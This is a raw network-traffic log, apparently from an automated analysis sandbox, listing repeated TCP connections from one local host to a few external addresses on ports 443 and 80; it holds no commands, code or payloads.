Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443

Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49711
